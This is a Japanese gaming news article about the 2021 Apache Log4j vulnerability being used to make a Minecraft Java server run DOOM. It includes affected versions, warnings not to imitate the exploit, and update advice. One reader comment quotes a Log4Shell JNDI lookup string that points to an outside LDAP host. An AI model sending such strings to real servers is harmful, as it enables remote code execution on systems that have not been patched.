【真似しちゃダメ】『マイクラ』にサーバー接続すると『DOOM』に早変わり…脆弱性が確認された「Apache Log4j」の“悪用”事例【UPDATE】 | Game*Spark - 国内・海外ゲーム情報サイト

ハードコアゲーマーのためのWebメディア

【真似しちゃダメ】『マイクラ』にサーバー接続すると『DOOM』に早変わり…脆弱性が確認された「Apache Log4j」の“悪用”事例【UPDATE】

脆弱性を利用した大変危険な行為です。真似などはしないようにしてください。

ゲーム文化 カルチャー

※注意:本記事はプログラムの脆弱性を利用する内容の紹介が含まれています。決して真似しないようにしてください。

2021年12月10日に脆弱性が発表された、Javaベースのログ出力ライブラリー「Apache Log4j」。この脆弱性を利用してJava版『マインクラフト』で、サーバーに接続すると『DOOM』がプレイできるという映像が公開されています。

「Apache Log4j」では、遠隔の第三者が細工したデータを送る事で任意のコマンドを実行される可能性がある、ゼロデイ脆弱性が発表されています。対象となるバージョンは「2.15.0」以前の2.~系のバージョンと、および出荷候補版「2.15.0-rc1」で、情報処理推進機構(IPA)のホームページには最新バージョンへの更新などの対策方法も掲載中です。

このサービスはJava版『マインクラフト』にも使用されているため、日本公式Twitterなどでも注意を呼びかけています。現在はアップデートで最新バージョンは対応済のほか、古いバージョンのサーバー向けの対策やダウンロードファイルなども紹介しています。

なお、脆弱性を利用することは大変な危険行為です。くれぐれも真似することなく最新バージョンへのアップデートをするようにしてください。

※UPDATE(2021/12/15 10:16):影響を受けるLog4jのバージョンを修正しました。

《Mr.Katoh》

酒と雑学をこよなく愛するゲーマー Mr.Katoh

サイドクエストに手を染めて本編がなかなか進まない系。ゲーマー幼少時から親の蔵書の影響でオカルト・都市伝説系に強い興味を持つほか、大学で民俗学を学ぶ。ライター活動以前にはリカーショップ店長経験があり、酒にも詳しい。好きなゲームジャンルはサバイバル、経営シミュレーション、育成シミュレーション、野球ゲームなど。日々のニュース記事だけでなく、ゲームのレビューや趣味や経歴を活かした特集記事なども掲載中。

【注目の記事】[PR]
コメント欄を非表示
※一度コメントを投稿した後は約120秒間投稿することができません
※コメントを投稿する際は「利用規約」を必ずご確認ください
  • スパくんのお友達 2021-12-15 3:44:11
    マイクラの中でDOOMじゃなくて、マイクラでDOOMをするとは…
    0 Good
    返信
  • スパくんのお友達 2021-12-14 14:47:33
    「2.15.0」、「2.15.0-rc1」は暫定の対策版のバージョンであって影響を受けるバージョンではないよん
    0 Good
    返信
  • スパくんのお友達 2021-12-14 12:15:26
    ついに奴らが動き出したか...

    よりによってこのタイミングとは...
    7 Good
    返信
  • スパくんのお友達 2021-12-14 12:11:55
    何でもかんでもDOOMをプレイしやがって!お前許さんぞ!
    21 Good
    返信
  • スパくんのお友達 2021-12-14 11:47:55
    でもJVM上で実行されるから、実際ホストPCへの影響はないんじゃないの?
    1 Good
    返信
    他の返信を表示 返信を非表示
  • スパくんのお友達 2021-12-14 11:36:56
    またDOOMやってるよ…
    18 Good
    返信
  • スパくんのお友達 2021-12-14 10:58:45
    脆弱性を利用して脆弱性を一時的に塞ぐパッチを当てるセキュリティ企業が出てきたり、
    今回はネタが尽きないな
    15 Good
    返信
  • スパくんのお友達 2021-12-14 10:57:07
    ${jndi:ldap://gamespark.jp/abc}というような文字列をチャット等に打つだけで悪用できてしまうヤバい脆弱性だから、見えない所にも影響が広がっていくだろうね
    6 Good
    返信
  • スパくんのお友達 2021-12-14 10:51:03
    同じマイクロソフトのキャラクターネタで仕込んだのかな?
    2 Good
    返信
    他の返信を表示 返信を非表示
  • スパくんのお友達 2021-12-14 10:06:20
    DOOM移植先
    NEW! 「マインクラフトサーバー」
    8 Good
    返信
    他の返信を表示 返信を非表示

編集部おすすめの記事

特集

ゲーム文化 アクセスランキング

  1. パンツ“モロ見え”にご用心!?『FF14』最新アライアンスレイド「サンドリア」―飛空艇で繰り広げられるアツい攻防戦

    パンツ“モロ見え”にご用心!?『FF14』最新アライアンスレイド「サンドリア」―飛空艇で繰り広げられるアツい攻防戦

  2. “『New スーパーマリオブラザーズ』コレクション”の怪しすぎるパッケージ画像が出回る…日英ごちゃ混ぜ&表記バラバラでほぼ偽物

    “『New スーパーマリオブラザーズ』コレクション”の怪しすぎるパッケージ画像が出回る…日英ごちゃ混ぜ&表記バラバラでほぼ偽物

  3. 約20年の開発期間を経て『Pirates Vikings & Knights II』がバージョン1.0に!『Half-Life 2』長寿Mod

    約20年の開発期間を経て『Pirates Vikings & Knights II』がバージョン1.0に!『Half-Life 2』長寿Mod

  4. 息子がスイッチの「みまもり設定」回避してる……!!相談する親に身に覚えがあるゲーマーたちから助言集まるも意外な結末へ

  5. 本当に帰ってくるかも「ペプシマン」、再ゲーム化で復活来るか!?ペプシ公式が意味深な投稿連発

  6. 『月姫』アルクェイドのモデルとされる人物、詳細23年越しに明らかに―海外ファンの調査、実を結ぶ

  7. 『スト6』キャミィがバニーガール姿に!人気のoutfit2がベース、鍛え上げられた肉体美にドキドキ

  8. ハッピーセット「ポケモン」騒動でマクドナルドが謝罪―より厳格な個数制限、ルールを守らない客の購入拒否、違反者のアプリ退会処理などを表明

  9. 新たな「ネット怪談」の誕生?中古3DSに残された奇妙な写真…果たしてその正体は

  10. 山のようなゴミを片付ける癒し系お掃除ゲーム『Cleaning Up!』発表!幽霊屋敷や古代神殿もお掃除しよう

アクセスランキングをもっと見る

page top